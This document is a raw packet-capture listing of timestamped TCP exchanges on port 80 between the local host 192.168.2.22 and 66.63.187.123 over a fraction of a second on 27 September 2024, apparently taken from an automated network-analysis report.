                                                                                                            Sep 27, 2024 16:00:35.973490953 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.973537922 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.973548889 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.973561049 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.973572016 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.973586082 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.973604918 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.973761082 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.973772049 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.973783016 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.973797083 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.973818064 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.973895073 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.973934889 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.973963976 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.973973036 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.973997116 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974008083 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974095106 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974107027 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974117994 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974137068 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974137068 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974153996 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974251986 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974262953 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974280119 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974291086 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974291086 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974298000 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974314928 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974340916 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974536896 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974548101 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974559069 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974569082 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974571943 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974580050 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974585056 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974590063 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974600077 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974602938 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974611998 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974612951 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974622965 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.974623919 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974647045 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.974654913 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975028992 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975040913 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975050926 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975060940 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975065947 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975073099 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975083113 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975083113 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975095034 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975095987 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975106001 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975106955 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975126028 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975132942 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975428104 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975439072 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975450039 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975460052 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975461960 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975471020 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975472927 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975488901 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975488901 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975507975 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975509882 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975517035 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975528955 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975531101 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975538969 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975542068 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975554943 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975558996 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975565910 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975567102 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975578070 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.975580931 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975600004 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975609064 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.975657940 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976162910 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976174116 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976183891 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976196051 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976206064 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976206064 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976214886 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976214886 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976227045 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976236105 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976239920 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976246119 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976264954 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976485968 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976496935 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976507902 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976519108 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976530075 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976531982 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976537943 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976564884 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976763010 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976773024 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.976798058 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.976809025 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011276007 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011326075 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011334896 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011348009 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011400938 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011400938 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011544943 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011555910 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011567116 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011579990 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011590004 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011611938 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011620998 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011784077 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011821032 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011890888 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011904955 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.011930943 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011957884 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.011989117 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.012000084 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.012012005 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.012022018 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.012037992 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.012054920 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.012202978 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.012216091 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.012248993 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055128098 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055141926 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055152893 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055179119 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055213928 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055246115 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055258036 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055268049 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055279970 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055280924 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055286884 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055305004 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055315018 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055474997 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055500031 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055515051 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055536032 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055557013 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055578947 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055591106 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055593967 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055603027 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055603981 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055609941 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055614948 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055628061 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055634022 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055650949 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055957079 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055965900 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055977106 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055986881 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055989981 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.055998087 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.055999041 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056009054 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056011915 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056025028 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056272030 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056282997 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056293964 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056302071 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056303024 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056308031 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056313992 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056325912 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056329966 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056343079 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056355000 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056518078 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056564093 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056660891 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056674004 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056679010 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056689024 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056696892 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056699991 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056710958 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056711912 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056719065 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056725979 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056736946 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056737900 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056749105 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056759119 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056760073 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.056766033 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056785107 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056791067 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.056919098 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.057301044 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.057312965 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.057324886 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.057337046 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.057348013 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.057348013 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.057348013 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.057358980 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.057362080 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.057369947 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.057374001 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.057389975 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.057399035 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060185909 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060230017 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060231924 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060245991 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060282946 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060295105 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060389996 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060401917 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060411930 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060422897 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060426950 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060435057 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060447931 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060458899 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060619116 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060631990 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060643911 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060666084 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060678959 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060780048 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060812950 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060815096 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060827017 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060843945 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060852051 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060854912 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.060863972 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060894966 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.060899973 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061043024 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061053038 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061079979 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061171055 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061184883 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061201096 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061203003 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061213970 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061218023 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061225891 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061232090 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061238050 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061258078 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061264992 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061278105 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061515093 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061527014 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061538935 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061553001 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061553955 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.061559916 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061569929 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.061583996 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062010050 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062021971 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062032938 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062042952 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062053919 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062067032 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062067032 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062073946 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062078953 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062088013 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062088966 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062103033 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062113047 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062113047 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062117100 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062129021 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062131882 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062151909 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062159061 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062452078 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062463999 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062477112 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062490940 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062491894 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062503099 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062505960 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062517881 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062520027 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062530041 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062541962 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062542915 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062550068 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062570095 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062581062 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062849045 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062863111 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062875032 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062886953 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.062890053 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062899113 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.062910080 CEST4916380192.168.2.2266.63.187.123
